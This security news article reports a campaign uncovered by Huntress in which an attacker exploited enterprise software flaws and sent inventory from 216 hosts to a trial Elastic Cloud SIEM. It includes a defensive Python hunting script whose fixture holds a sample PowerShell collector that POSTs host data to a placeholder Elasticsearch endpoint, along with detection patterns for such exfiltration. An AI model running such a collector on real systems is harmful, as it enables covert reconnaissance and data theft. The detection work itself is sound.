Threat Actor Exploits Enterprise Flaws, Uses Elastic Cloud SIEM as Data Repository for Stolen System Info
Huntress researchers uncovered a campaign where a threat actor exploited vulnerabilities in SolarWinds Web Help Desk and other enterprise software, then used a free trial of Elastic Cloud SIEM to store and triage stolen system data from over 200 hosts.

A sophisticated campaign uncovered by Huntress researchers reveals a threat actor exploiting multiple enterprise software vulnerabilities to compromise over 200 hosts across 34 Active Directory domains, then using a free trial of Elastic Cloud's security information and event management (SIEM) platform as a data repository for stolen system information.
The attacker exploited flaws in widely used enterprise tools, SolarWinds Web Help Desk among them, and ran an encoded PowerShell command on each compromised system. The script collected detailed host information, including operating system details, hardware specifications, Active Directory data, and installed patch levels, and transmitted it to an Elasticsearch index named 'systeminfo' in the attacker-controlled Elastic Cloud instance.
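A hunt for the tradecraft described above, decoding `-EncodedCommand` payloads from process-creation events and flagging ones that gather host inventory and POST it to an Elasticsearch document endpoint. This is an added example and not Huntress's or Elastic's code; the event records, hostnames, the collector script and its endpoint URL are constructed placeholders (the only detail taken from the report is the index name 'systeminfo'), and the indicator regexes are assumptions about what such a collector typically contains.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so the switch regex is built from every prefix of the full name.
_ENC_SWITCH = "|".join(re.escape("encodedcommand"[:n]) for n in range(1, len("encodedcommand") + 1))
ENC_CMD_RE = re.compile(rf"(?i)(?:^|\s)-(?:{_ENC_SWITCH})\s+([A-Za-z0-9+/=]+)")

# Assumed indicators for "inventory collection + write into an Elasticsearch index".
# 'systeminfo' is the index name from the report; the other patterns are generic.
INDICATORS = {
    "es_document_api": re.compile(r"/[\w\-]+/_doc\b|/_bulk\b", re.I),
    "systeminfo_index": re.compile(r"/systeminfo/", re.I),
    "http_client": re.compile(r"Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient|HttpClient", re.I),
    "host_inventory": re.compile(
        r"Win32_OperatingSystem|Win32_ComputerSystem|Get-HotFix|Get-ADComputer|USERDNSDOMAIN", re.I
    ),
}


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample scripts (assumed shapes, not the campaign's actual payload).
SUSPECT_SCRIPT = (
    "$i = @{host=$env:COMPUTERNAME; os=(Get-CimInstance Win32_OperatingSystem).Caption; "
    "domain=$env:USERDNSDOMAIN; hotfix=(Get-HotFix | Select -Expand HotFixID)}; "
    "Invoke-RestMethod -Method Post -Uri 'https://deployment.example.cloud.es.io/systeminfo/_doc' "
    "-Headers @{Authorization='ApiKey REDACTED'} -Body ($i | ConvertTo-Json) -ContentType 'application/json'"
)
BENIGN_SCRIPT = "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\temp\\svc.csv"

# Constructed process-creation events (placeholder hostnames; fields loosely modelled on 4688/Sysmon).
SAMPLE_EVENTS = [
    {"host": "SRV-WHD01", "cmdline": f"powershell.exe -NoP -W Hidden -EncodedCommand {encode_ps(SUSPECT_SCRIPT)}"},
    {"host": "SRV-FILE02", "cmdline": f"powershell.exe -ExecutionPolicy Bypass -enc {encode_ps(BENIGN_SCRIPT)}"},
    {"host": "WS-0042", "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an -EncodedCommand payload, else None."""
    m = ENC_CMD_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload: not decodable here, worth a manual look


def classify(script: str):
    """Names of the indicators that fire on a decoded script, sorted for stable output."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script))


def hunt(events, min_indicators: int = 2):
    """Flag events whose decoded PowerShell trips at least min_indicators indicators."""
    findings = []
    for ev in events:
        script = decode_encoded_command(ev["cmdline"])
        if script is None:
            continue
        hits = classify(script)
        if len(hits) >= min_indicators:
            findings.append({"host": ev["host"], "indicators": hits, "script": script})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["host"], f["indicators"])
        print("  ", f["script"][:120], "...")
```

Requiring two indicators keeps ordinary encoded admin scripts (the second event) out of the result; the point of decoding rather than alerting on `-EncodedCommand` alone is that the inventory cmdlets and the `/_doc` or `/_bulk` write are only visible after decoding.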
Instead of traditional command-and-control (C2) infrastructure, the attacker turned a legitimate security monitoring tool into a repository for stolen data. The Elastic Cloud deployment was created on January 28, 2026, and remained active for several days. Telemetry showed the operator repeatedly interacting with the environment through the Kibana interface, logging hundreds of actions while examining incoming victim data.
Further analysis revealed that the trial account was registered with a disposable email address on the domain quieresmail.com, part of the Russian-registered temporary email network firstmail.ltd, which operates hundreds of throwaway domains. Administrative logins to the SIEM instance were traced to IP addresses believed to be exits of a Safing privacy network (VPN) tunnel.
The campaign affected at least 216 hosts, the majority of them servers running Windows Server 2019 or 2022. Victims spanned government organizations, universities, financial services, manufacturing and automotive firms, IT service providers, and retailers. Some victim hostnames suggested the attacker was also exploiting vulnerabilities in Microsoft SharePoint.
Researchers coordinated with Elastic and law enforcement to notify affected organizations and investigate the infrastructure. The cloud instance used in the campaign has since been taken offline. Huntress performed outreach and victim notification to organizations identified within the uncovered data.
This incident highlights a tactic in which attackers repurpose legitimate security tooling for data aggregation, turning a defensive monitoring platform into a reconnaissance hub; because the destination is a legitimate SaaS endpoint reached over HTTPS, the uploads blend in with ordinary outbound traffic. The disposable email domain and VPN tunnel show the attacker's attention to operational security, while the breadth of sectors hit suggests broad espionage or reconnaissance rather than a targeted attack.